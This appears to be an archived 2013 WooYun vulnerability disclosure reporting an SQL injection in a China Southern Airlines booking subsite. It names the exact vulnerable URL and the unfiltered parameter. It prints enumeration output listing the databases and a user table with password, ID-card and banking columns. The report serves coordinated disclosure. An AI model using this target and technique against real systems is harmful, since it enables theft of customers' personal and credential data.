乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-18: 细节已通知厂商并且等待厂商处理中 2013-06-22: 厂商已经确认,细节仅向厂商公开 2013-07-02: 细节向核心白帽子及相关领域专家公开 2013-07-12: 细节向普通白帽子公开 2013-07-22: 细节向实习白帽子公开 2013-08-02: 细节向公众公开
中国南方航空某分站存在SQL注入可获取用户信息
http://b2c.csair.com/B2C40/data/order/importPNR/getPnrRules.xsql?typeid=1
参数:typeid没有过滤
available databases [6]:[*] ECS[*] ECS_REPORT[*] OUTLN[*] SYS[*] SYSTEM[*] XDB
back-end DBMS: OracleDatabase: ECSTable: USERDATA[59 columns]+----------------+----------+| Column | Type |+----------------+----------+| LANGUAGE | VARCHAR2 || ABOUTME | VARCHAR2 || ALIAS | VARCHAR2 || ANSWER | VARCHAR2 || ATTRIBUTE1 | VARCHAR2 || ATTRIBUTE2 | VARCHAR2 || ATTRIBUTE3 | VARCHAR2 || ATTRIBUTE4 | VARCHAR2 || ATTRIBUTE5 | VARCHAR2 || ATTRIBUTE6 | NUMBER || ATTRIBUTE7 | NUMBER || ATTRIBUTE8 | NUMBER || BIRTHDATE | DATE || CELLPHONE | VARCHAR2 || CHECKINAIRPORT | VARCHAR2 || CITY | VARCHAR2 || CORP | VARCHAR2 || COUNTRY | VARCHAR2 || CREATEDATE | DATE || DEPARTMENTNAME | VARCHAR2 || ENDDATE | DATE || ENNAME | VARCHAR2 || FAX | VARCHAR2 || FLAG | CHAR || FPCARDNO | VARCHAR2 || HOME | VARCHAR2 || HOMEPHONE | VARCHAR2 || IDCARD | VARCHAR2 || INSERTDATE | DATE || ISEXTERNAL | NUMBER || LARGECLIENTNO | VARCHAR2 || LASTLOGIN | DATE || LASTORDER | DATE || LASTUPDATE | DATE || LOCATION | VARCHAR2 || MANAGERGUID | VARCHAR2 || MEMBERID | VARCHAR2 || NAME | VARCHAR2 || OFFICE | VARCHAR2 || OPENACCOUNT | VARCHAR2 || OPENBANK | VARCHAR2 || ORGUNITGUID | VARCHAR2 || ORIGINAL | CHAR || ORIGINALID | VARCHAR2 || PASSWORD | VARCHAR2 || PASSWORDHINT | VARCHAR2 || PICTUREURL | VARCHAR2 || PRIORITYORDER | NUMBER || REGION | VARCHAR2 || RTCNUMBER | VARCHAR2 || SEX | CHAR || SIGNATUREURL | VARCHAR2 || STATUS | CHAR || SUBSCIBEFLAG | CHAR || TITLE | VARCHAR2 || USERGUID | VARCHAR2 || WEBSITEURL | VARCHAR2 || WORKMAIL | VARCHAR2 || WORKPHONE | VARCHAR2 |+----------------+----------+
对所传的值进行过滤。。
危害等级:高
漏洞Rank:12
确认时间:2013-06-22 21:37
暂无